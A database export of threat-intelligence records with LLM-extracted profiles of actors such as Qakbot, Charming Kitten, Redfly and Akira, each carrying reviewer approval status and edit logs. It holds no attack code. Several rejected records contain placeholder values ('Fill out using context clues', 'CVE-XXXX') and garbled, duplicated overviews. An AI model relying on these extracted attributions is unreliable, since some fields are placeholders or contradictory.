  "raw_openAI_analysis": "{\"threat_actor\": [\"Qakbot\"], \"aliases\": [\"Qbot\", \"Pinkslipbot\"], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [], \"threat_actor_overview\": [\"The Qakbot botnet\", \" also known as Qbot or Pinkslipbot\", \" has been disrupted in an international cyber takedown operation conducted by law enforcement agencies. The operation began on August 25\", \" 2023\", \" when law enforcement gained access to the botnet and redirected its traffic through servers controlled by them. Qakbot-infected computers were instructed to download an Uninstall file\", \" designed to remove Qakbot malware from the infected machines and prevent further installations. However\", \" it did not address other malware already present on the systems.\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_sophistication\": [], \"threat_actor_type\": [], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": []}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-07T21:39:26.181Z"
  },
  "approval_message": "It's either giving extra details or no details. ",
  "change_log": [],
  "threat_actor": "Qakbot"
},
{
  "_id": {
    "$oid": "64ff5e9a44615f0051a3ac32"
  },
  "report": {
    "$oid": "64ff5e3ff644071736369846"
  },
  "threat_actor_overview": "Charming Kitten,  also known as Phosphorus,  TA453,  APT35/42,  is a nation-state threat actor that has been observed deploying a previously unknown backdoor malware named 'Sponsor' against 34 companies around the globe. They primarily exploited CVE-2021-26855,  a Microsoft Exchange remote code execution vulnerability,  to gain initial access to their targets' networks. The campaign targeted government,  healthcare organizations,  and firms engaged in various industries such as financial services,  engineering,  manufacturing,  technology,  law,  and telecommunications.,  or APT35/42,  is a nation-state threat actor primarily originating from Iran. They have been observed deploying a previously unknown backdoor malware named 'Sponsor' against 34 companies globally. The campaign targeted government and healthcare organizations,  as well as firms engaged in financial services, Charming Kitten is an Iranian nation-state threat actor that has been observed deploying the 'Sponsor' backdoor malware. They target a range of organizations in various industries,  including government,  healthcare,  financial services,  and telecommunications. Charming Kitten primarily exploits the Microsoft Exchange vulnerability CVE-2021-26855 to gain initial access to its targets' networks. The Sponsor backdoor is notable for its ability to hide configuration files and evade detection. The campaign observed by ESET researchers spanned from March 2021 to June 2022,  with Israel,  Brazil,  and the United Arab Emirates being the most targeted countries. ESET has shared IOCs to aid in defense against potential future threats.,  is a nation-state threat actor primarily originating from Iran. They have recently been observed deploying a new backdoor malware called 'Sponsor' against 34 companies around the globe. The campaign targeted government and healthcare organizations",
  "aliases": [
    "Phosphorus",
    "TA453",
    "APT35/42"
  ],
  "sources": [
    "ESET researchers",
    "ESET"
  ],
  "country_of_origin": "IR",
  "threat_actor_motives": [],
  "threat_actor_intent": [],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "government"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "IL",
    "BR",
    "AE"
  ],
  "target_regions": [
    "asia",
    "americas",
    "middle-east"
  ],
  "target_populations": [
    "84110",
    "71121",
    "61300",
    "61200",
    "61100",
    "64110",
    "69101",
    "62090",
    "86101"
  ],
  "target_industry_sectors": [
    "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
    "x-industry-sector--c88e363f-e571-4d51-937b-ebb88a6dafcb",
    "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f",
    "x-industry-sector--9ec6b337-b075-4143-8bda-13b2fdeea8f1",
    "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860",
    "x-industry-sector--bb358902-b786-4067-9de8-75277fe7a71e",
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
    "x-industry-sector--1dd8ed24-7655-4f0d-80ef-35c36a5b0593",
    "x-industry-sector--95c98046-4589-4c5f-976a-99089bb77b37",
    "x-industry-sector--2ee175fb-298f-43e8-a76c-8c02638598c5"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [
    "CVE-2021-26855"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"Charming Kitten\", \"country_of_origin\": \"IR\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Charming Kitten,  also known as Phosphorus,  TA453,  APT35/42,  is a nation-state threat actor that has been observed deploying a previously unknown backdoor malware named 'Sponsor' against 34 companies around the globe. They primarily exploited CVE-2021-26855,  a Microsoft Exchange remote code execution vulnerability,  to gain initial access to their targets' networks. The campaign targeted government,  healthcare organizations,  and firms engaged in various industries such as financial services,  engineering,  manufacturing,  technology,  law,  and telecommunications.,  or APT35/42,  is a nation-state threat actor primarily originating from Iran. They have been observed deploying a previously unknown backdoor malware named 'Sponsor' against 34 companies globally. The campaign targeted government and healthcare organizations,  as well as firms engaged in financial services, Charming Kitten is an Iranian nation-state threat actor that has been observed deploying the 'Sponsor' backdoor malware. They target a range of organizations in various industries,  including government,  healthcare,  financial services,  and telecommunications. Charming Kitten primarily exploits the Microsoft Exchange vulnerability CVE-2021-26855 to gain initial access to its targets' networks. The Sponsor backdoor is notable for its ability to hide configuration files and evade detection. The campaign observed by ESET researchers spanned from March 2021 to June 2022,  with Israel,  Brazil,  and the United Arab Emirates being the most targeted countries. ESET has shared IOCs to aid in defense against potential future threats.,  is a nation-state threat actor primarily originating from Iran. They have recently been observed deploying a new backdoor malware called 'Sponsor' against 34 companies around the globe. The campaign targeted government and healthcare organizations\", \"target_countries\": [\"IL\", \"BR\", \"AE\"], \"target_regions\": [\"asia\", \"americas\", \"middle-east\"], \"target_populations\": [\"government\", \"healthcare\", \"financial-services\", \"engineering\", \"manufacturing\", \"technology\", \"law\", \"telecommunications\"], \"threat_actor_intent\": [], \"target_industry_sectors\": [\"government-public-services\", \"healthcare\", \"financial-services\", \"technology\", \"manufacturing\", \"telecommunications\", \"government\", \"government-national\", \"government-regional\", \"government-local\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [\"government\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"Phosphorus\", \"TA453\", \"APT35/42\"], \"vulnerabilities\": [\"CVE-2021-26855\"], \"sources\": [\"ESET researchers\", \"ESET\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Charming Kitten\"], \"aliases\": [\"Phosphorus\", \"TA453\", \"APT35/42\"], \"country_of_origin\": [\"IR\"], \"target_countries\": [\"IL\", \"BR\", \"AE\"], \"target_regions\": [\"asia\", \"americas\", \"middle-east\", \"Middle East\", \"South America\", \"Asia\"], \"threat_actor_overview\": [\"\", \"Charming Kitten\", \" also known as Phosphorus\", \" TA453\", \" APT35/42\", \" is a nation-state threat actor that has been observed deploying a previously unknown backdoor malware named 'Sponsor' against 34 companies around the globe. They primarily exploited CVE-2021-26855\", \" a Microsoft Exchange remote code execution vulnerability\", \" to gain initial access to their targets' networks. The campaign targeted government\", \" healthcare organizations\", \" and firms engaged in various industries such as financial services\", \" engineering\", \" manufacturing\", \" technology\", \" law\", \" and telecommunications.\", \" or APT35/42\", \" is a nation-state threat actor primarily originating from Iran. They have been observed deploying a previously unknown backdoor malware named 'Sponsor' against 34 companies globally. The campaign targeted government and healthcare organizations\", \" as well as firms engaged in financial services\", \"Charming Kitten is an Iranian nation-state threat actor that has been observed deploying the 'Sponsor' backdoor malware. They target a range of organizations in various industries\", \" including government\", \" healthcare\", \" financial services\", \" and telecommunications. Charming Kitten primarily exploits the Microsoft Exchange vulnerability CVE-2021-26855 to gain initial access to its targets' networks. The Sponsor backdoor is notable for its ability to hide configuration files and evade detection. The campaign observed by ESET researchers spanned from March 2021 to June 2022\", \" with Israel\", \" Brazil\", \" and the United Arab Emirates being the most targeted countries. ESET has shared IOCs to aid in defense against potential future threats.\", \" is a nation-state threat actor primarily originating from Iran. They have recently been observed deploying a new backdoor malware called 'Sponsor' against 34 companies around the globe. The campaign targeted government and healthcare organizations\"], \"target_populations\": [\"government\", \"healthcare\", \"financial-services\", \"engineering\", \"manufacturing\", \"technology\", \"law\", \"telecommunications\"], \"target_industry_sectors\": [\"government-public-services\", \"healthcare\", \"financial-services\", \"technology\", \"manufacturing\", \"law\", \"telecommunications\", \"engineering\", \"government\", \"government-national\", \"government-regional\", \"government-local\"], \"threat_actor_intent\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [\"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [\"\"], \"attack_consequences\": [\"\"], \"vulnerabilities\": [\"CVE-2021-26855\"], \"sources\": [\"\", \"ESET researchers\", \"ESET\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "approval_status_changed_on": {
    "$date": "2023-09-14T19:19:35.208Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "65008bd58cdbcbff3922aeda"
      },
      "updated_by": "RzJzJwgfCxeudrKPanKVvkDOi123",
      "updated_on": {
        "$date": "2023-09-12T16:03:33.470Z"
      },
      "changes": [
        {
          "field": "target_populations",
          "previous_value": [
            "84110",
            "71121",
            "61300",
            "61200",
            "61100",
            "64110",
            "69101",
            "62090",
            "86101",
            "manufacturing"
          ],
          "updated_value": [
            "84110",
            "71121",
            "61300",
            "61200",
            "61100",
            "64110",
            "69101",
            "62090",
            "86101"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "65008bc68cdbcbff3922aed9"
      },
      "updated_by": "RzJzJwgfCxeudrKPanKVvkDOi123",
      "updated_on": {
        "$date": "2023-09-12T16:03:18.977Z"
      },
      "changes": [
        {
          "field": "target_populations",
          "previous_value": [
            "government",
            "healthcare",
            "financial-services",
            "engineering",
            "manufacturing",
            "technology",
            "law",
            "telecommunications"
          ],
          "updated_value": [
            "84110",
            "71121",
            "61300",
            "61200",
            "61100",
            "64110",
            "69101",
            "62090",
            "86101",
            "manufacturing"
          ]
        }
      ]
    }
  ],
  "threat_actor": "Charming Kitten"
},
{
  "_id": {
    "$oid": "64ff7b1e78250ca8a301fcf8"
  },
  "report": {
    "$oid": "64ff79e739ffeb5aa0e25408"
  },
  "threat_actor_overview": "",
  "aliases": [],
  "sources": [],
  "country_of_origin": "",
  "threat_actor_motives": [],
  "threat_actor_intent": [],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [],
  "threat_actor_type": [],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Unknown\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_type\": [], \"aliases\": [], \"vulnerabilities\": [], \"sources\": []}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Unknown\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [null], \"target_regions\": [], \"threat_actor_overview\": [], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_sophistication\": [], \"threat_actor_type\": [], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [{\"CVE_ID\": null}], \"sources\": []}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-11T20:40:12.359Z"
  },
  "approval_message": "No information extracted\n",
  "change_log": [],
  "threat_actor": "Unknown"
},
{
  "_id": {
    "$oid": "64ff7bda78250ca8a301fcfa"
  },
  "report": {
    "$oid": "64ff7b6839ffeb5aa0e25409"
  },
  "threat_actor_overview": "",
  "aliases": [],
  "sources": [],
  "country_of_origin": "RU",
  "threat_actor_motives": [],
  "threat_actor_intent": [],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [],
  "threat_actor_type": [],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [
    "eastern-europe"
  ],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"DarkGate\", \"country_of_origin\": \"RU\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"\", \"target_countries\": [], \"target_regions\": [\"eastern-europe\"], \"target_populations\": [], \"threat_actor_intent\": [], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_type\": [], \"aliases\": [], \"vulnerabilities\": [], \"sources\": []}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"DarkGate\"], \"aliases\": [], \"country_of_origin\": [\"RU\"], \"target_countries\": [], \"target_regions\": [\"eastern-europe\"], \"threat_actor_overview\": [], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_sophistication\": [], \"threat_actor_type\": [], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": []}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-11T20:46:47.795Z"
  },
  "approval_message": "No information",
  "change_log": [],
  "threat_actor": "DarkGate"
},
{
  "_id": {
    "$oid": "6500cdb7f5418ad16f4613df"
  },
  "report": {
    "$oid": "6500cd8d706f6f9074be79c8"
  },
  "threat_actor_overview": "Fill out using context clues",
  "country_of_origin": "unknown, CN",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft"
  ],
  "threat_actor_capabilities": [
    "T1234",
    "T5678"
  ],
  "threat_actor_resources": [
    "government"
  ],
  "threat_actor_type": [
    "criminal"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "US",
    "UK"
  ],
  "target_regions": [
    "asia",
    "europe"
  ],
  "target_populations": [
    "ISIC Code"
  ],
  "target_industry_sectors": [
    "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [
    "CVE-XXXX",
    "CVE-YYYY"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"Unknown, Fill out using context clues\", \"country_of_origin\": \"unknown, CN\", \"attack_mitigations\": \"Fill out using context clues\", \"attack_consequences\": \"Fill out using context clues\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Fill out using context clues\", \"target_countries\": [\"US\", \"UK\"], \"target_regions\": [\"asia\", \"europe\"], \"target_populations\": [\"ISIC Code\"], \"threat_actor_intent\": [\"Information Theft\"], \"target_industry_sectors\": [\"financial-services\", \"technology\"], \"threat_actor_capabilities\": [\"T1234\", \"T5678\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_type\": [\"criminal\"], \"aliases\": [\"Fill out using context clues\"], \"vulnerabilities\": [\"CVE-XXXX\", \"CVE-YYYY\"], \"sources\": [\"Fill out using context clues\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Unknown\", \"Fill out using context clues\"], \"aliases\": [\"Fill out using context clues\"], \"country_of_origin\": [\"unknown\", \"CN\"], \"target_countries\": [\"US\", \"UK\"], \"target_regions\": [\"asia\", \"europe\"], \"threat_actor_overview\": [\"Fill out using context clues\"], \"target_populations\": [\"ISIC Code\"], \"target_industry_sectors\": [\"financial-services\", \"technology\"], \"threat_actor_intent\": [\"Information Theft\"], \"threat_actor_capabilities\": [\"T1234\", \"T5678\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"criminal\"], \"attack_mitigations\": [\"Fill out using context clues\"], \"attack_consequences\": [\"Fill out using context clues\"], \"vulnerabilities\": [{\"CVE_ID\": null}, \"CVE-XXXX\", \"CVE-YYYY\"], \"sources\": [\"Fill out using context clues\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-27T20:50:55.792Z"
  },
  "approval_message": "Rerun, bad information in threat insight. ",
  "change_log": [
    {
      "_id": {
        "$oid": "6500ce66706f6f9074be79cc"
      },
      "updated_by": "bZWMRuiSPjWGfbhDpDVPLRBkixL2",
      "updated_on": {
        "$date": "2023-09-12T20:47:34.613Z"
      },
      "changes": [
        {
          "field": "aliases",
          "previous_value": [
            "Fill out using context clues"
          ],
          "updated_value": []
        }
      ]
    },
    {
      "_id": {
        "$oid": "6500ce5d706f6f9074be79cb"
      },
      "updated_by": "bZWMRuiSPjWGfbhDpDVPLRBkixL2",
      "updated_on": {
        "$date": "2023-09-12T20:47:25.346Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Unknown, Fill out using context clues",
          "updated_value": "Ryuk Ransomware"
        }
      ]
    },
    {
      "_id": {
        "$oid": "6500ce36706f6f9074be79ca"
      },
      "updated_by": "bZWMRuiSPjWGfbhDpDVPLRBkixL2",
      "updated_on": {
        "$date": "2023-09-12T20:46:46.604Z"
      },
      "changes": [
        {
          "field": "attack_mitigations",
          "previous_value": "Fill out using context clues",
          "updated_value": ""
        },
        {
          "field": "attack_consequences",
          "previous_value": "Fill out using context clues",
          "updated_value": ""
        }
      ]
    },
    {
      "_id": {
        "$oid": "6500ce19706f6f9074be79c9"
      },
      "updated_by": "bZWMRuiSPjWGfbhDpDVPLRBkixL2",
      "updated_on": {
        "$date": "2023-09-12T20:46:17.920Z"
      },
      "changes": [
        {
          "field": "sources",
          "previous_value": [
            "Fill out using context clues"
          ],
          "updated_value": []
        }
      ]
    }
  ],
  "threat_actor": "Ryuk Ransomware"
},
{
  "_id": {
    "$oid": "6501fcdb6669740592b380d6"
  },
  "report": {
    "$oid": "6501fa9df437d158ed9d9023"
  },
  "threat_actor_overview": "",
  "aliases": [],
  "sources": [
    "Symantec",
    "Bleeping Computer"
  ],
  "country_of_origin": "RU",
  "threat_actor_motives": [],
  "threat_actor_intent": [
    "Espionage",
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "government"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "UA",
    "US"
  ],
  "target_regions": [
    "northern-america",
    "europe",
    "asia"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--ef2d23ce-63f5-4f4e-b0fa-d09a5d743cc8",
    "x-industry-sector--61b2d4fd-c6e0-457e-86a1-d787bb768f89"
  ],
  "attack_mitigations": "",
  "attack_consequences": "Disruption of service, compromising of availability & confidentiality.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Redfly\", \"country_of_origin\": \"Unknown\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"\", \"target_countries\": [], \"target_regions\": [\"asia\"], \"target_populations\": [], \"threat_actor_intent\": [], \"target_industry_sectors\": [\"utilities\", \"energy\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [\"government\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": []}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Redfly\", \"\"], \"aliases\": [\"\"], \"country_of_origin\": [\"Unknown\"], \"target_countries\": [null, {\"ISO_3166-1_alpha-2\": null}], \"target_regions\": [\"asia\"], \"threat_actor_overview\": [\"\"], \"target_populations\": [], \"target_industry_sectors\": [\"utilities\", \"energy\"], \"threat_actor_intent\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [\"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [\"\"], \"attack_consequences\": [\"\"], \"vulnerabilities\": [{\"CVE_ID\": null}, {\"CVE-IDs\": null}], \"sources\": [\"\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
  "approval_status_changed_on": {
    "$date": "2023-09-25T18:49:25.770Z"
  },
  "approval_message": "Just not enough information overall. ",
  "change_log": [
    {
      "_id": {
        "$oid": "6501fdecf437d158ed9d9028"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-13T18:22:36.011Z"
      },
      "changes": [
        {
          "field": "attack_consequences",
          "previous_value": "",
          "updated_value": "Disruption of service, compromising of availability & confidentiality."
        }
      ]
    },
    {
      "_id": {
        "$oid": "6501fd8ff437d158ed9d9027"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-13T18:21:03.771Z"
      },
      "changes": [
        {
          "field": "target_countries",
          "previous_value": [
            "US"
          ],
          "updated_value": [
            "UA",
            "US"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "6501fd71f437d158ed9d9026"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-13T18:20:33.168Z"
      },
      "changes": [
        {
          "field": "sources",
          "previous_value": [],
          "updated_value": [
            "Symantec",
            "Bleeping Computer"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "6501fd51f437d158ed9d9025"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-13T18:20:01.991Z"
      },
      "changes": [
        {
          "field": "target_countries",
          "previous_value": [],
          "updated_value": [
            "US"
          ]
        },
        {
          "field": "target_regions",
          "previous_value": [
            "asia"
          ],
          "updated_value": [
            "northern-america",
            "europe",
            "asia"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "6501fd0af437d158ed9d9024"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-13T18:18:50.125Z"
      },
      "changes": [
        {
          "field": "threat_actor_intent",
          "previous_value": [],
          "updated_value": [
            "Espionage",
            "Disruption of Service"
          ]
        },
        {
          "field": "country_of_origin",
          "previous_value": "Unknown",
          "updated_value": "RU"
        }
      ]
    }
  ],
  "threat_actor": "Redfly"
},
{
  "_id": {
    "$oid": "65032643ec50dcb9138dee37"
  },
  "report": {
    "$oid": "650323234a82011bb9812ff8"
  },
  "threat_actor_overview": "The Akira ransomware group emerged as a cybercriminal force in April of the year. Initially known for attacking Windows systems,  the group has now expanded its capabilities to exploit Linux systems. The group primarily focuses on compromising and stealing data from its victims using double-extortion tactics,  threatening to leak data on the Dark Web if they don't pay the requested ransom., The Akira ransomware group emerged as a cybercriminal force in April of this year. Initially known for attacking Windows systems",
  "aliases": [],
  "sources": [
    "Cyble Research and Intelligence Labs (CRIL)",
    "BleepingComputer",
    "MalwareHunterTeam"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "criminal"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "US"
  ],
  "target_regions": [
    "americas",
    "northern-america"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--91fac210-8e3c-4436-9b67-63fb3cdc55a2",
    "x-industry-sector--db5f2096-51fa-4a2f-b380-6029b5ddcf5e",
    "x-industry-sector--0a91ae59-b7de-418c-a719-580725830bb0",
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
    "x-industry-sector--16940452-fa06-4ba4-912f-b10789681f56",
    "x-industry-sector--532c8286-2c6e-4ad3-8ffd-6d2d49f1b757",
    "x-industry-sector--1dd8ed24-7655-4f0d-80ef-35c36a5b0593"
  ],
  "attack_mitigations": "Conducting regular backup practices and keeping those backups offline or in a separate network, Turning on the automatic software update feature on computers as well as other mobile and connected devices, Using reliable and trusted antivirus and Internet security software package on all connected devices, Refraining from opening untrusted links and email attachments without verifying their authenticity, Detaching infected devices on the same network, disconnecting any connected external storage devices, and inspecting system logs for suspicious events, Detaching infected devices on the same network, disconnecting any connected external storage devices, and inspecting system logs for suspicious events upon detection of ransomware, Immediately detaching infected devices on the same network, disconnecting any connected external storage devices, and inspecting system logs for suspicious events",
  "attack_consequences": "Data theft, Financial loss, Potential data leak on the Dark Web, Financial loss due to ransom payment, Potential leak of sensitive data on the Dark Web",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Akira\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Conducting regular backup practices and keeping those backups offline or in a separate network, Turning on the automatic software update feature on computers as well as other mobile and connected devices, Using reliable and trusted antivirus and Internet security software package on all connected devices, Refraining from opening untrusted links and email attachments without verifying their authenticity, Detaching infected devices on the same network, disconnecting any connected external storage devices, and inspecting system logs for suspicious events, Detaching infected devices on the same network, disconnecting any connected external storage devices, and inspecting system logs for suspicious events upon detection of ransomware, Immediately detaching infected devices on the same network, disconnecting any connected external storage devices, and inspecting system logs for suspicious events\", \"attack_consequences\": \"Data theft, Financial loss, Potential data leak on the Dark Web, Financial loss due to ransom payment, Potential leak of sensitive data on the Dark Web\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The Akira ransomware group emerged as a cybercriminal force in April of the year. Initially known for attacking Windows systems,  the group has now expanded its capabilities to exploit Linux systems. The group primarily focuses on compromising and stealing data from its victims using double-extortion tactics,  threatening to leak data on the Dark Web if they don't pay the requested ransom., The Akira ransomware group emerged as a cybercriminal force in April of this year. Initially known for attacking Windows systems\", \"target_countries\": [\"US\"], \"target_regions\": [\"americas\", \"northern-america\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"target_industry_sectors\": [\"education\", \"manufacturing\", \"financial-services\", \"construction\", \"agriculture\", \"automotive\", \"chemical\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"criminal\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"Cyble Research and Intelligence Labs (CRIL)\", \"BleepingComputer\", \"MalwareHunterTeam\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Akira\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [\"US\"], \"target_regions\": [\"americas\", \"northern-america\"], \"threat_actor_overview\": [\"The Akira ransomware group emerged as a cybercriminal force in April of the year. Initially known for attacking Windows systems\", \" the group has now expanded its capabilities to exploit Linux systems. The group primarily focuses on compromising and stealing data from its victims using double-extortion tactics\", \" threatening to leak data on the Dark Web if they don't pay the requested ransom.\", \"The Akira ransomware group emerged as a cybercriminal force in April of this year. Initially known for attacking Windows systems\"], \"target_populations\": [], \"target_industry_sectors\": [\"education\", \"manufacturing\", \"professional-services\", \"financial-services\", \"construction\", \"agriculture\", \"food and beverage\", \"IT and ITES\", \"real estate\", \"consumer goods\", \"automotive\", \"chemical\", \"food-and-beverage\", \"IT\", \"real-estate\", \"consumer-goods\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"intermediate\"], \"threat_actor_type\": [\"criminal\"], \"attack_mitigations\": [\"Conducting regular backup practices and keeping those backups offline or in a separate network\", \"Turning on the automatic software update feature on computers as well as other mobile and connected devices\", \"Using reliable and trusted antivirus and Internet security software package on all connected devices\", \"Refraining from opening untrusted links and email attachments without verifying their authenticity\", \"Detaching infected devices on the same network, disconnecting any connected external storage devices, and inspecting system logs for suspicious events\", \"Detaching infected devices on the same network, disconnecting any connected external storage devices, and inspecting system logs for suspicious events upon detection of ransomware\", \"Immediately detaching infected devices on the same network, disconnecting any connected external storage devices, and inspecting system logs for suspicious events\"], \"attack_consequences\": [\"Data theft\", \"Financial loss\", \"Potential data leak on the Dark Web\", \"Financial loss due to ransom payment\", \"Potential leak of sensitive data on the Dark Web\"], \"vulnerabilities\": [], \"sources\": [\"Cyble Research and Intelligence Labs (CRIL)\", \"BleepingComputer\", \"MalwareHunterTeam\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-15T20:54:33.699Z"
  },
  "approval_message": "Reports sufficiently accurate data",
  "change_log": [],
  "threat_actor": "Akira"
},
{
  "_id": {
    "$oid": "65033d2415c3b3bbc7e9e4ee"
  },
  "report": {
    "$oid": "65033ce8106ab198451fbe4d"
  },
